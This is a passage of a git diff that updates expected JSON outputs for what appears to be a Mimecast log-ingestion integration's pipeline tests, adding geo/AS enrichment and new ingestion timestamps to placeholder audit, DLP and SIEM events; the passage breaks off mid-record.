@@ -482,12 +614,24 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "reason": "Reason: Wrong password", "action": "logon-authentication-failed", - "ingested": "2021-12-09T15:16:03.637543Z", + "ingested": "2021-12-14T14:48:19.342448528Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:55+0000\",\"eventInfo\":\"Failed authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-12, Time: 09:47:55 BST, IP: 67.43.156.15, Application: mimecast-moa, Method: Office 365, Reason: Wrong password\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg", "created": "2021-10-11T22:47:55.000Z" 
@@ -521,11 +665,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "existing-archive-task-changed", - "ingested": "2021-12-09T15:16:03.637552300Z", + "ingested": "2021-12-14T14:48:19.342448913Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w\",\"auditType\":\"Existing Archive Task Changed\",\"user\":\"johdoe@example.com\",\"eventTime\":\"2021-10-12T08:47:54+0000\",\"eventInfo\":\"Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\\\"365\\\") to new migrated connector (\\\"Sync and Recover - 365\\\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w", "created": "2021-10-12T08:47:54.000Z" 
@@ -559,11 +715,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "connectors-management", - "ingested": "2021-12-09T15:16:03.637557100Z", + "ingested": "2021-12-14T14:48:19.342449302Z", "original": "{\"id\":\"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM\",\"auditType\":\"Connectors Management\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:53+0000\",\"eventInfo\":\"Connector creation for Microsoft O365\\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"integrations_and_apis\"}", "id": "eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM", "created": "2021-10-12T08:47:53.000Z" 
@@ -602,11 +770,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "page-data-exports", - "ingested": "2021-12-09T15:16:03.637561700Z", + "ingested": "2021-12-14T14:48:19.342449695Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U\",\"auditType\":\"Page Data Exports\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T02:27:18+0000\",\"eventInfo\":\"[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :67.43.156.15,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 67.43.156.15, Application: mimecast-matfe\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U", "created": "2021-10-12T02:27:18.000Z" 
@@ -640,11 +820,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "custom-report-definition-created", - "ingested": "2021-12-09T15:16:03.637565500Z", + "ingested": "2021-12-14T14:48:19.342450168Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF\",\"auditType\":\"Custom Report Definition Created\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-11T19:53:41+0000\",\"eventInfo\":\"Action Performed - Custom Report Definition Created with name \\\"Terri test\\\" and description \\\"all user - per email report\\\" by johndoe@example.local\u003cjohndoe@example.local\u003e Date: 2021-10-11 Time: 20:53:41 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"reporting_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF", "created": "2021-10-11T20:53:41.000Z" 
@@ -677,11 +869,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "folder-log-entry", - "ingested": "2021-12-09T15:16:03.637570300Z", + "ingested": "2021-12-14T14:48:19.342450570Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh\",\"auditType\":\"Folder Log Entry\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T18:23:10+0000\",\"eventInfo\":\"Action Performed - Deleted New Folder by johndoe@example.com\u003cJohn Doe\u003e Date: 2021-10-11 Time: 19:23:10 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"profile_group_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh", "created": "2021-10-11T19:23:10.000Z" 
@@ -711,7 +915,7 @@ }, "event": { "action": "user-password-changed", - "ingested": "2021-12-09T15:16:03.637576500Z", + "ingested": "2021-12-14T14:48:19.342450983Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSCtF28jc2DDLwd_d1NM7ULnLzdnPzdwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiCAQ6SsmlxSX5ualFyfkpqUCbnE3MHM1NgcrLUouKM_PzlKwMawGTZipR\",\"auditType\":\"User Password Changed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:56:55+0000\",\"eventInfo\":\"Password reset for user: johndoe@example.com User Password Changed, Remote IP is null\",\"category\":\"user_account_and_role_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCtF28jc2DDLwd_d1NM7ULnLzdnPzdwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiCAQ6SsmlxSX5ualFyfkpqUCbnE3MHM1NgcrLUouKM_PzlKwMawGTZipR" }, 
@@ -743,11 +947,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "remediation-incident-adjustment", - "ingested": "2021-12-09T15:16:03.637582900Z", + "ingested": "2021-12-14T14:48:19.342451340Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:49:30+0000\",\"eventInfo\":\"Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\\\"fileHash\\\":\\\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\\\",\\\"start\\\":\\\"2021-09-12T19:48:59+0000\\\",\\\"end\\\":\\\"2021-10-12T19:48:59+0000\\\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w", "type": "type : manual", 
@@ -782,11 +998,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-restore", - "ingested": "2021-12-09T15:16:03.637588800Z", + "ingested": "2021-12-14T14:48:19.342451694Z", "original": "{\"id\":\"eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:20:01+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw", "created": "2021-10-12T19:20:01.000Z" 
@@ -820,11 +1048,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-restore", - "ingested": "2021-12-09T15:16:03.637594800Z", + "ingested": "2021-12-14T14:48:19.342452056Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoejr@example.com\",\"eventTime\":\"2021-10-12T18:19:33+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84", "created": "2021-10-12T18:19:33.000Z" 
@@ -858,11 +1098,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-export-download", - "ingested": "2021-12-09T15:16:03.637600700Z", + "ingested": "2021-12-14T14:48:19.342452408Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0\",\"auditType\":\"Archive Mailbox Export Download\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:55:14+0000\",\"eventInfo\":\"Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0", "created": "2021-10-12T17:55:14.000Z" 
@@ -896,11 +1148,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "review-set-action", - "ingested": "2021-12-09T15:16:03.637606400Z", + "ingested": "2021-12-14T14:48:19.342452886Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul\",\"auditType\":\"Review Set Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:07:00+0000\",\"eventInfo\":\"Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul", "created": "2021-10-12T17:07:00.000Z" 
@@ -934,11 +1198,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "remediation-incident-adjustment", - "ingested": "2021-12-09T15:16:03.637611100Z", + "ingested": "2021-12-14T14:48:19.342453242Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T15:38:05+0000\",\"eventInfo\":\"Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\\\"unremediateCode\\\":\\\"TR-C46A75-01419-M\\\",\\\"from\\\":\\\"gmail.com\\\",\\\"start\\\":\\\"2021-10-10T15:33:49+0000\\\",\\\"end\\\":\\\"2021-10-12T15:33:49+0000\\\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38", "type": "type : restore", diff --git a/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json b/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json index 478ae824720..ff154d67416 100644 --- a/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json +++ b/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json 
@@ -10,7 +10,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:05.359023300Z", + "ingested": "2021-12-14T14:48:20.988315125Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:25+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204122.2CA6DFCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:25+0000" }, @@ -39,7 +39,7 @@ }, "event": { "action": "notification", - "ingested": "2021-12-09T15:16:05.359032800Z", + "ingested": "2021-12-14T14:48:20.988317655Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:25+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204122.2CA6DFCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:25+0000" }, @@ -68,7 +68,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:05.359038900Z", + "ingested": "2021-12-14T14:48:20.988318132Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:22+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204119.F16C2FCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:22+0000" }, 
@@ -97,7 +97,7 @@ }, "event": { "action": "notification", - "ingested": "2021-12-09T15:16:05.359044900Z", + "ingested": "2021-12-14T14:48:20.988318486Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:22+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204119.F16C2FCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:22+0000" }, @@ -126,7 +126,7 @@ }, "event": { "action": "notification", - "ingested": "2021-12-09T15:16:05.359050800Z", + "ingested": "2021-12-14T14:48:20.988318849Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:21+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204118.05EA6FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:21+0000" }, @@ -155,7 +155,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:05.359056700Z", + "ingested": "2021-12-14T14:48:20.988319259Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:21+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204118.05EA6FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:21+0000" }, 
@@ -184,7 +184,7 @@ }, "event": { "action": "notification", - "ingested": "2021-12-09T15:16:05.359062400Z", + "ingested": "2021-12-14T14:48:20.988319668Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:19+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204116.6A8CFFCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:19+0000" }, @@ -213,7 +213,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:05.359068200Z", + "ingested": "2021-12-14T14:48:20.988320038Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:19+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204116.6A8CFFCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:19+0000" }, @@ -242,7 +242,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:05.359078400Z", + "ingested": "2021-12-14T14:48:20.988320398Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:17+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204114.8AE40FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:17+0000" }, 
@@ -271,7 +271,7 @@ }, "event": { "action": "notification", - "ingested": "2021-12-09T15:16:05.359084700Z", + "ingested": "2021-12-14T14:48:20.988320761Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:17+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204114.8AE40FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:17+0000" }, diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json index 3b0e08ffe44..e5aafa1d00b 100644 --- a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json +++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json @@ -8,7 +8,7 @@ "event": { "reason": "Spm", "action": "Hld", - "ingested": "2021-12-09T15:16:05.665545500Z", + "ingested": "2021-12-14T14:48:21.314971609Z", "original": "{\"Act\":\"Hld\",\"AttCnt\":0,\"AttNames\":null,\"AttSize\":0,\"Content-Disposition\":\"attachment; filename=\\\"process_20211018093329655.json\\\"\",\"Hld\":\"Spm\",\"MsgId\":\"\\u003cINX.164dae0719be95da77068c7d264.3e915.e7719.c78c.17c926a3231ace@newsletter.77onlineshop.eu\\u003e\",\"MsgSize\":157436,\"Sender\":\"bounce_9244+cdaahhimyaaaaagaad5ekqaaaaaaaaeribenpq@newsletter.77onlineshop.eu\",\"Subject\":\"Hi Sandra! Neue Styles eingetroffen! – Finde deinen Lieblings-Look!\",\"aCode\":\"HhuwRf_AOcuJZINE2ZgcKw\",\"acc\":\"ABC123\",\"datetime\":\"2021-10-18T09:02:43+0100\"}", "created": "2021-10-18T09:02:43+0100", "outcome": "unknown" 
@@ -37,35 +37,32 @@ } }, { - "rule": { - "name": "Office365" - }, - "source": { - "ip": "67.43.156.15" - }, - "error": { - "type": "Recipient email address is possibly incorrect", - "code": "550" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-10-19T06:06:40.000Z", "ecs": { "version": "1.12.0" }, + "rule": { + "name": "Office365" + }, "tls": { "cipher": "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "established": true, "version": "TLSv1.2" }, + "source": { + "ip": "67.43.156.15" + }, "event": { "reason": "5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]", - "ingested": "2021-12-09T15:16:05.665550Z", + "ingested": "2021-12-14T14:48:21.314974253Z", "original": "{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"67.43.156.15\",\"RejType\":\"Recipient email address is possibly 